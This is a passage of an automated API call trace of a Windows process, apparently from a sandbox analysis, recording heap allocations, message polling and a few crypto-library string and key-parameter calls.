hHeap=0x770000) returned 1 [0039.855] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0039.855] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0039.855] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0039.855] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0039.855] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0039.855] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0039.855] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da3f8 [0039.855] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0039.856] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0039.856] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0039.856] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0039.856] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889508 [0039.856] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0039.856] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0039.856] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0039.856] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0039.856] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0039.856] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0039.856] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0039.856] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0039.856] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0039.856] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0039.856] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0039.856] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0039.856] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0039.856] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0039.856] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0039.856] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0039.856] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0039.856] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2b8 [0039.856] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0039.856] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0039.856] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0039.856] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0039.856] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0039.856] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0039.856] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0039.856] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0039.856] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0039.856] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0039.856] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0039.856] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0039.857] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0039.857] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0039.857] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0039.857] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0039.857] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0039.857] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0039.857] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0039.857] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0039.857] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0039.857] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0039.857] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0039.857] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0039.857] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3e8 [0039.857] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16c0 | out: hHeap=0x770000) returned 1 [0039.857] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0039.857] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0039.857] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0039.857] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0039.857] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0039.857] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0039.857] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0039.857] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0039.857] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0039.857] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0039.857] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0039.857] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0039.857] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0039.857] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0039.857] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0039.857] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0039.857] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0039.858] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0039.858] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0039.858] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0039.858] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0039.858] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0039.858] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0039.858] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0039.858] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0039.858] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0039.858] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0039.858] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0039.858] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0039.858] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0039.858] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0039.858] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0039.858] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0039.858] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0039.858] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0039.858] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0039.858] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0039.858] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0039.858] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0039.858] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0039.858] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0039.858] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0039.858] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0039.858] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0039.858] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0039.858] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.859] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.859] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0039.859] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cb50 [0039.859] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0039.859] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0039.859] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2d8 [0039.859] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0039.859] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0039.859] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0039.859] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0039.859] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0039.859] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0039.859] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0039.859] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0039.859] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0039.859] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0039.859] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0039.859] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0039.859] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0039.859] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0039.859] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0039.859] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0039.859] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0039.859] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0039.859] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0039.859] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0039.859] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0039.859] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0039.859] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0039.859] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0039.860] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0039.860] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0039.860] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0039.860] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0039.860] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0039.860] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0039.860] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0039.860] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0039.860] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0039.860] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16c0 | out: hHeap=0x770000) returned 1 [0039.860] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0039.860] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0039.860] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0039.860] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0039.860] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2d8 [0039.860] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0039.860] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0039.860] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0039.860] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0039.860] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0039.860] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0039.860] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0039.860] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0039.860] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2d8 [0039.860] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0039.860] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0039.860] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0039.860] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0039.860] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0039.860] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0039.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0039.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0039.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0039.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16c0 | out: hHeap=0x770000) returned 1 [0039.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0039.861] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0039.861] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0039.861] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0039.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0039.861] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0039.861] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0039.861] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0039.861] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0039.861] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0039.861] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0039.861] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0039.861] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0039.861] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0039.861] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0039.861] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0039.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0039.861] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0039.861] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0039.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0039.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0039.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0039.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0039.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0039.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0039.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0039.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0039.862] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0039.862] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16c0 | out: hHeap=0x770000) returned 1 [0039.862] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0039.862] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0039.862] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0039.862] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0039.862] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0039.862] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0039.862] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0039.862] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0039.862] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0039.862] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0039.862] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.862] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0039.862] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0039.862] CryptGetKeyParam (in: hKey=0x7c21c0, dwParam=0x7, pbData=0x7da3e8, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da3e8*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0039.862] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0039.862] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0039.862] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.862] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.862] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.862] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.862] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0039.862] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.863] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.863] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0039.863] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c88 | out: hHeap=0x770000) returned 1 [0039.863] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0039.863] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0039.863] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0039.863] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.863] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0039.863] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0039.863] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0039.863] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0039.863] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0039.863] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0039.863] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.863] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0039.863] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0039.863] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0039.863] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0039.863] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0039.863] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0039.863] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.863] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 